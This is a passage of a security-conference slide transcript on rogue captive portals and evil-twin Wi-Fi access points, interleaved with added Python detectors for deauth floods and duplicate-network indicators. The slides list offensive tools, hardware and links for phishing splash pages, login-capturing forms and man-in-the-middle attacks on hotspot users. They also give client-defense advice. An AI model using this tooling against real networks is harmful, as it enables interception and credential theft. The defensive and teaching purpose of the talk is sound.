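                "first_ts": q[0],
                "last_ts": f.ts,
            })
    return alerts


AP_VICTIM = "aa:bb:cc:dd:ee:01"   # constructed BSSID under attack
AP_QUIET = "aa:bb:cc:dd:ee:02"    # constructed BSSID behaving normally
CLIENT = "11:22:33:44:55:66"      # constructed client MAC


def sample_frames():
    """Constructed capture: beacons, one benign deauth, then a one-second flood."""
    frames = [Frame(0.1 * i, BEACON, AP_VICTIM, AP_VICTIM, BROADCAST)
              for i in range(60)]
    # a single deauth from the quiet AP (e.g. an idle timeout) is not a flood
    frames.append(Frame(1.0, DEAUTH, AP_QUIET, AP_QUIET, CLIENT))
    # 25 broadcast deauths in one second, source spoofed to the victim AP
    frames += [Frame(5.0 + 0.04 * i, DEAUTH, AP_VICTIM, AP_VICTIM, BROADCAST)
               for i in range(25)]
    return frames


def run():
    """Run the detector over the constructed capture and return its alerts."""
    return detect_deauth_flood(sample_frames())


if __name__ == "__main__":
    for a in run():
        print(f"deauth flood on {a['bssid']}: {a['count']} frames in "
              f"{a['window_s']}s ({a['broadcast']} broadcast)")
```

The single deauth from the quiet AP never reaches the threshold, while the flood trips it on its tenth frame. On the mitigation side, 802.11w (Protected Management Frames) is what actually stops unauthenticated deauth and disassoc frames from being honored; this detector only makes the flood visible.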
  • 37. Generic Splash Page Pineapple Configuration /etc/nodogsplash/htdocs/splash.html
  • 38. Landing Page Pineapple Configuration - JavaScript Necessities /www/[directory]/index.html
  • 39. PHP Form Processor Pineapple Configuration Easier than using IPTables /www/[directory]/auth/login.php
  • 44. A word of caution w/ the Pineapple…
  • 45. A word of caution w/ the Pineapple…
  • 46. Existing Router Ideally one supporting guest mode…
  • 47. DDWRT • Flash with DDWRT, then you can use NocatSplash to configure a captive portal. • Many other ways to go about this… DDWRT is just one of the easier options. • http://www.dd-wrt.com/site/index • http://sourceforge.net/projects/nocatsplash/
  • 51. Laptop Hotspot and/or Proxy • Kali Linux • http://www.kali.org/ • Can do just about anything to connecting clients • Unlimited attack potential and plenty of drive space to build elaborate landing pages and believable scenarios
  • 52. PwnStar - By SilverFoxx • Makes hacking Wi-Fi even easier! • https://github.com/SilverFoxx/PwnSTAR
  • 55. Demo
  • 57. Combine Pineapple portability with the versatility of Kali Linux • http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/
  • 58. BeagleBone Black + Alfa Wi-Fi Card http://beagleboard.org/black http://www.alfa.com.tw/
  • 59. BeagleBone AP Deployment Options get creative…
  • 61. Going Mobile! • Nexus Device with Kali NetHunter • https://www.kali.org/kali-linux-nethunter/ • Pwnie Express Pwn Phone/Pad • https://www.pwnieexpress.com/product/pwn-phone2014/
  • 66. MITM Basic Tools • AirSSL • AirJack • Airsnarf • Dsniff • Cain • void11 • Ferret • SSLStrip • Wireshark • AirPwn • Ettercap • Etc…
  • 67. You don’t even need to authenticate to attack clients
  • 68. Fun with MITM • Snapception - https://github.com/thebradbain/snapception • Love Thy Neighbors - http://neighbor.willhackforsushi.com/ • AirPWN - http://airpwn.sourceforge.net/Airpwn.html • Intercepter-NG - http://intercepter.nerf.ru/ • Many, many more…
  • 69. Demo
  • 70. Client Defense… • Always use a VPN/VPS/SSH port forwarding/etc. when connected to an open access point. • Turn all wireless devices off when traveling or in crowded areas; many devices still connect to wireless networks even when ‘sleeping’. • Be wary of a hotspot login page that is not served over HTTPS, and of other generally suspicious behavior. • Beware duplicate networks with different encryption.
  • 71. Client Defense… • Use different login details and passwords for public Wi-Fi. Test false credentials first; if it lets you through, it’s not legit. • Turn off Wi-Fi on devices when traveling. • Exercise caution when connections suddenly drop, especially if it happens for everyone on the network. • If it just ‘doesn’t feel right’ then trust your instincts…
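Two of the client-side checks on the slides above can be automated on the client: "duplicate networks with different encryption" and "hotspot not served over HTTPS". The script below is an added example in Python for those two slides, not code from the talk. The scan records, the table of previously joined networks and the BSSIDs are all constructed; in practice the scan would be filled from `nmcli dev wifi list` or `iw dev <iface> scan` and the known table from the client's saved network profiles. The vendor-prefix (OUI) comparison is a heuristic assumption: it separates an ordinary multi-AP deployment from a foreign radio, but an attacker can pick any MAC, so treat its findings as indicators, not proof.

```python
"""Rogue-hotspot / evil-twin indicators from a constructed Wi-Fi scan.

Added example for the 'Client Defense' slides; not code from the talk.
Scan records, known-network table and all MAC addresses are constructed.
"""
from collections import defaultdict
from urllib.parse import urlparse

# Constructed scan result: (ssid, bssid, security, signal_dbm)
SCAN = [
    ("CoffeeShop_Free", "00:11:22:33:44:55", "WPA2", -60),
    ("CoffeeShop_Free", "de:ad:be:ef:00:01", "OPEN", -35),  # louder and open: twin?
    ("Hotel_Guest",     "66:77:88:99:aa:bb", "OPEN", -70),
    ("Hotel_Guest",     "66:77:88:99:aa:bc", "OPEN", -72),  # same OUI: ordinary multi-AP
    ("HomeNet",         "aa:bb:cc:dd:ee:ff", "WPA2", -50),
    ("HomeNet",         "12:34:56:78:9a:bc", "WPA2", -80),  # right name, foreign radio
]

# Constructed 'previously joined' table: ssid -> (security, {bssids seen before})
KNOWN = {
    "CoffeeShop_Free": ("WPA2", {"00:11:22:33:44:55"}),
    "HomeNet": ("WPA2", {"aa:bb:cc:dd:ee:ff"}),
}


def oui(bssid):
    """First three octets of a MAC address, i.e. the vendor prefix."""
    return bssid.lower()[:8]


def find_twins(scan, known):
    """Return findings for SSIDs that look like duplicates with a twist:
    mixed security among APs sharing one name, a security type that differs
    from what this client joined before, or an unfamiliar radio vendor
    advertising a known name.
    """
    by_ssid = defaultdict(list)
    for ssid, bssid, sec, sig in scan:
        by_ssid[ssid].append((bssid.lower(), sec.upper(), sig))

    findings = []
    for ssid, aps in by_ssid.items():
        # slide 70: 'duplicate networks with different encryption'
        if len({sec for _, sec, _ in aps}) > 1:
            findings.append({"ssid": ssid, "reason": "mixed-security",
                             "aps": [(b, s) for b, s, _ in aps]})
        if ssid not in known:
            continue  # never joined: nothing to compare against
        known_sec, known_bssids = known[ssid]
        known_ouis = {oui(b) for b in known_bssids}
        for bssid, sec, _ in aps:
            if sec != known_sec:
                findings.append({"ssid": ssid, "reason": "security-mismatch",
                                 "aps": [(bssid, sec)]})
            elif bssid not in known_bssids and oui(bssid) not in known_ouis:
                findings.append({"ssid": ssid, "reason": "unknown-bssid",
                                 "aps": [(bssid, sec)]})
    return findings


def portal_url_ok(url):
    """Slide 70: a captive-portal login page should be served over HTTPS."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and bool(parsed.netloc)


if __name__ == "__main__":
    for f in find_twins(SCAN, KNOWN):
        print(f"{f['ssid']}: {f['reason']} {f['aps']}")
    for url in ("https://portal.example/login", "http://portal.example/login"):
        print(url, "ok" if portal_url_ok(url) else "NOT HTTPS")
```

On the constructed scan, the open "CoffeeShop_Free" radio is reported twice (mixed security for the name, and a mismatch against the WPA2 profile the client saved), the second "HomeNet" radio is reported for its unfamiliar vendor prefix, and the two "Hotel_Guest" APs, which share a prefix and a security type, are not reported at all.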
  • 72. Resources • http://www.willhackforsushi.com/code/cpscam.pl • http://neighbor.willhackforsushi.com/ • http://www.aircrack-ng.org/ • http://www.dd-wrt.com/ • https://github.com/SilverFoxx/PwnSTAR • http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/ • http://beagleboard.org/black • http://www.armhf.com/boards/beaglebone-black/bbb-sd-install/ • http://grinninggecko.com/2013/09/13/kali-linux-on-headless-beaglebone-black-via-os-x/ • https://github.com/thebradbain/snapception • http://airpwn.sourceforge.net/Airpwn.html • http://intercepter.nerf.ru/
  • 73. Thank You! Questions? https://github.com/gfoss/misc/Wireless/Captive-Portals/ Greg Foss, Senior Security Research Engineer, greg.foss[at]LogRhythm.com, @heinzarelli